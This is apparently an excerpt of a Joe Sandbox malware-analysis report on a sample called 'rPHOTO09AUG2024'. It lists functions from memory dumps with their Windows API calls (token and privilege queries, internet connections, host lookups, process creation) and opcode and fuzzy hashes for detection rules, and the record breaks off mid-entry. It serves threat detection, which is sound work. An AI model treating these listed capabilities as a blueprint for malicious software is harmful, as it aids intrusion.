API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 48afa02f0701666f5c3e1d906ad27361ed91e7223466465b26833caf494a02ce
Instruction ID: 448f53292d46a0d863daf0027166d25eee1998a3f1e53b7f033fc4bfa838e436
Opcode Fuzzy Hash: 48afa02f0701666f5c3e1d906ad27361ed91e7223466465b26833caf494a02ce
Instruction Fuzzy Hash: 791106329042047FCB04B7B5AC439BFBB69DF45320F18011AF10497292EF215D959BB5

Function 00D98B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98669
Part of subcall function 00D98652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D98673
Part of subcall function 00D98652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98682
Part of subcall function 00D98652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98689
Part of subcall function 00D98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D98BEB
_memcmp.LIBCMT ref: 00D98C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D98C44
HeapFree.KERNEL32(00000000), ref: 00D98C4B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 9bf629cd24bad23ed83cac09912adb60d2fb37eef6fffc3f601058fe5f90e085
Instruction ID: 637caa6af7d3c7cb32e41ef9a4bd781491470a1c2e1ef08e12196e1414fcc0e3
Opcode Fuzzy Hash: 9bf629cd24bad23ed83cac09912adb60d2fb37eef6fffc3f601058fe5f90e085
Instruction Fuzzy Hash: AF219A71E01209EFCF10DFA4C944BEEB7B8EF41745F08405AE454AB240DB30AA06EB70

Function 00DB1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DB1A97

Part of subcall function 00DB1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB1B40
Part of subcall function 00DB1B21: InternetCloseHandle.WININET(00000000), ref: 00DB1BDD

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
Instruction ID: f1d76af02002ac49fd9c5349698dd76d37b008ff44f89ff7dcd00e90db0fac69
Opcode Fuzzy Hash: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
Instruction Fuzzy Hash: 3721923A200606FFDB119F608C15FFAB7AAFF45701F54011AFA5296650EB71E82197B4

Function 00D9E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00D9E1C4,?,?,?,00D9EFB7,00000000,000000EF,00000119,?,?), ref: 00D9F5BC
Part of subcall function 00D9F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00D9F5E2
Part of subcall function 00D9F5AD: lstrcmpiW.KERNEL32(00000000,?,00D9E1C4,?,?,?,00D9EFB7,00000000,000000EF,00000119,?,?), ref: 00D9F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00D9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00D9E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00D9E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00D9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00D9E237

Strings

cdecl, xrefs: 00D9E22E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: f41f05874ae5acb8faf7a069903d534f28a7994d66cc9382e64a2c987af26cc9
Instruction ID: 8bbc728f0d9e4e515858abffcf663aa7e0b9a581a7a8c3b3fcda3c984a0a12a1
Opcode Fuzzy Hash: f41f05874ae5acb8faf7a069903d534f28a7994d66cc9382e64a2c987af26cc9
Instruction Fuzzy Hash: 4A118136100345EFCF25AF64D845D7A77A9FF85350B44402AF806CB2A0EB71D85197B4

Function 00D75332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D75351

Part of subcall function 00D6594C: __FF_MSGBANNER.LIBCMT ref: 00D65963
Part of subcall function 00D6594C: __NMSG_WRITE.LIBCMT ref: 00D6596A
Part of subcall function 00D6594C: RtlAllocateHeap.NTDLL(01140000,00000000,00000001,00000000,?,?,?,00D61013,?), ref: 00D6598F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 8ae7b534ab1b9487978dac3363a7a1f9b35fc66152ba8a767f9d8c3f0ab0141a
Instruction ID: 93ef03653a419f028de6dc5b8b11ae2b485f95350aeea77f2125a92588f581a9
Opcode Fuzzy Hash: 8ae7b534ab1b9487978dac3363a7a1f9b35fc66152ba8a767f9d8c3f0ab0141a
Instruction Fuzzy Hash: 1C11E772504B16AFCB213F70BC0565D3B94DF103A0F14852AF949961B1EEF6C9809771

Function 00D44531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D44560

Part of subcall function 00D4410D: _memset.LIBCMT ref: 00D4418D
Part of subcall function 00D4410D: _wcscpy.LIBCMT ref: 00D441E1
Part of subcall function 00D4410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D441F1

KillTimer.USER32(?,00000001,?,?), ref: 00D445B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D445C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D7D6CE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: b2ad8071e6b8f463dd8a0b2586548194a3fc61b50a5755290656f8bfbbd6a84d
Instruction ID: ccffd0d5e971139eb277f58fce7a8b68c4bf2c151387c668d475506c43dadf22
Opcode Fuzzy Hash: b2ad8071e6b8f463dd8a0b2586548194a3fc61b50a5755290656f8bfbbd6a84d
Instruction Fuzzy Hash: 9F21F970904788AFEB329B24DC55BEBBBED9F01304F04409EE69E96281D7745AC4CB71

Function 00DB667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7B20,?,?,00000000), ref: 00D45B8C
Part of subcall function 00D45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7B20,?,?,00000000,?,?), ref: 00D45BB0

gethostbyname.WSOCK32(?,?,?), ref: 00DB66AC
WSAGetLastError.WSOCK32(00000000), ref: 00DB66B7
_memmove.LIBCMT ref: 00DB66E4
inet_ntoa.WSOCK32(?), ref: 00DB66EF

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 560c62e903c6ab97cc3b1069aabd0d95a2f8779754b2db539853e13cad4d8ee0
Instruction ID: 530293b853789fd44e0fc5b7bc20dc1cb91c373f6edc181d04fe057b2a0775c2
Opcode Fuzzy Hash: 560c62e903c6ab97cc3b1069aabd0d95a2f8779754b2db539853e13cad4d8ee0
Instruction Fuzzy Hash: 59112B7550050AAFCF04EBA5ED96DEEB7B9EF48310B188065F506A7262DF30AE04DB71

Function 00D99023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00D99043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D99055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D9906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D99086

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
Instruction ID: 2c79a09803838c42fb16c202af1fd30f8b3d3e77273def0e1486eec19d8bca7d
Opcode Fuzzy Hash: d19f8a5f954c40b05e154aad95aade37b9136262fe381e62a9584a6b28b97f83
Instruction Fuzzy Hash: 38113A79901218BFDF10DFA9C984E9DFB74FB48310F204095E914B7250D6726E10DBA0

Function 00D41290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

DefDlgProcW.USER32(?,00000020,?), ref: 00D412D8
GetClientRect.USER32(?,?), ref: 00D7B84B
GetCursorPos.USER32(?), ref: 00D7B855
ScreenToClient.USER32(?,?), ref: 00D7B860

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: c47151b5a21820b2fa7cce8a486d44d527dcb83d307e741d8b1b4f769eb17666
Instruction ID: 128269efa00f750d3debfce31a1ef05f75aea9820a7823246cca39e708c80765
Opcode Fuzzy Hash: c47151b5a21820b2fa7cce8a486d44d527dcb83d307e741d8b1b4f769eb17666
Instruction Fuzzy Hash: 9F114C39A0011AAFCB00DF98D886DFE77B9FB05300F404456F941E7250D770BA918BB9

Function 00DA1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DA01FD,?,00DA1250,?,00008000), ref: 00DA166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00DA01FD,?,00DA1250,?,00008000), ref: 00DA1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00DA01FD,?,00DA1250,?,00008000), ref: 00DA169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00DA01FD,?,00DA1250,?,00008000), ref: 00DA16D1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: f3c52cde1bec5f111832c96a5410681f1ce4d10f982dec71059e2f110de7517f
Instruction ID: c2e2f4a8b39819ed2a619712606098e730b6ff574ed01b520e429615d6de7f15
Opcode Fuzzy Hash: f3c52cde1bec5f111832c96a5410681f1ce4d10f982dec71059e2f110de7517f
Instruction Fuzzy Hash: 74111836C00A1ADBCF009FA5D948AEEBB78FF1A751F094056E980F6240CB3095608BB6

Function 00D77207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00D7722B

Part of subcall function 00D77912: __fltout2.LIBCMT ref: 00D7793B

__cftog_l.LIBCMT ref: 00D77251
__cftoe_l.LIBCMT ref: 00D77283

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 794bd7f1eadb9a2e260888ce9c2b30592fe12a9b6e88615f6ac3eefd7e90f29e
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8D01403604414ABBCF125E84CC028EE3F62BF59355B588915FA2C58032E737C9B1ABA5

Function 00DCB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DCB59E
ScreenToClient.USER32(?,?), ref: 00DCB5B6
ScreenToClient.USER32(?,?), ref: 00DCB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DCB5F5

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
Instruction ID: 3e1be231929d58571012853b9dad53b1a506f64403b71ac2ef47e8c369188465
Opcode Fuzzy Hash: 04ed4cdc5c8697f44ff50b5aef0bbaa9953e326e27d01bd88eaa295ecdc9aa07
Instruction Fuzzy Hash: 1C1146B5D0020AEFDB41CF99C444AEEFBB5FB08310F104166E954E3720D735AA558F60

Function 00DCB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DCB8FE
_memset.LIBCMT ref: 00DCB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E07F20,00E07F64), ref: 00DCB93C
CloseHandle.KERNEL32 ref: 00DCB94E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 73932f30730aaf168f76cb84740afdb6663eec5ea33590a7b83a376f5f3a5ec2
Instruction ID: 8bfb0e9988c9fe3027f3e83dffafafff7bbe08eb32dc3009297a21ab215e2502
Opcode Fuzzy Hash: 73932f30730aaf168f76cb84740afdb6663eec5ea33590a7b83a376f5f3a5ec2
Instruction Fuzzy Hash: 2EF054B1A483437FE3106B61AC06FBB3A5CEB09354F004021FB48E6291DB72694487B8

Function 00DA6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00DA6E88

Part of subcall function 00DA794E: _memset.LIBCMT ref: 00DA7983

_memmove.LIBCMT ref: 00DA6EAB
_memset.LIBCMT ref: 00DA6EB8
LeaveCriticalSection.KERNEL32(?), ref: 00DA6EC8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: b3bb48de9eecfcb3cf89980b0cb4ff12fd4325e0af54830b49529299cf13140a
Instruction ID: c742348403d0d8bb67897f21791e541612674c89d9fd0daf47d1cc3659db0d7b
Opcode Fuzzy Hash: b3bb48de9eecfcb3cf89980b0cb4ff12fd4325e0af54830b49529299cf13140a
Instruction Fuzzy Hash: 80F0F47A204214ABCF416F55DC85E8AFB2AEF45361B048065FE089E226C731E951DBB5

Function 00DCC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D4134D
Part of subcall function 00D412F3: SelectObject.GDI32(?,00000000), ref: 00D4135C
Part of subcall function 00D412F3: BeginPath.GDI32(?), ref: 00D41373
Part of subcall function 00D412F3: SelectObject.GDI32(?,00000000), ref: 00D4139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DCC030
LineTo.GDI32(00000000,?,?), ref: 00DCC03D
EndPath.GDI32(00000000), ref: 00DCC04D
StrokePath.GDI32(00000000), ref: 00DCC05B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8fc63cb201a927100ea3c5c30cae11ba8a6ff64f82dce51c3a4a2ff01a1bbcae
Instruction ID: 8d0a6346055d8a8a3a5c1d94c8c13619c8e0e22410d1785875609b27eb5e608f
Opcode Fuzzy Hash: 8fc63cb201a927100ea3c5c30cae11ba8a6ff64f82dce51c3a4a2ff01a1bbcae
Instruction Fuzzy Hash: 47F05E3100135BFBDB126F55AC0AFCE3F5AAF05711F088004FA15A11E287B555A5EBB9

Function 00D9A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D9A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9A3AC
GetCurrentThreadId.KERNEL32 ref: 00D9A3B3
AttachThreadInput.USER32(00000000), ref: 00D9A3BA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1819ada022447f1b8bda666c71fa0aa76949ffbba20422ea2c162d4b256eb854
Instruction ID: 0252f6f0650756ebe7fb1dcde92adc18e61ec7a772b30b7401facbde7738f762
Opcode Fuzzy Hash: 1819ada022447f1b8bda666c71fa0aa76949ffbba20422ea2c162d4b256eb854
Instruction Fuzzy Hash: 5EE0393218132ABADB202BA2DC0CED73F1DEF167A1F048025F908C4060C671C540CBF0

Function 00D42218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00D42231
SetTextColor.GDI32(?,000000FF), ref: 00D4223B
SetBkMode.GDI32(?,00000001), ref: 00D42250
GetStockObject.GDI32(00000005), ref: 00D42258
GetWindowDC.USER32(?,00000000), ref: 00D7C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00D7C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00D7C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00D7C112
GetPixel.GDI32(00000000,?,?), ref: 00D7C132
ReleaseDC.USER32(?,00000000), ref: 00D7C13D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c8f708cf3042be3710841871a6841091fbb8b0530d558c633a7690bb742c5961
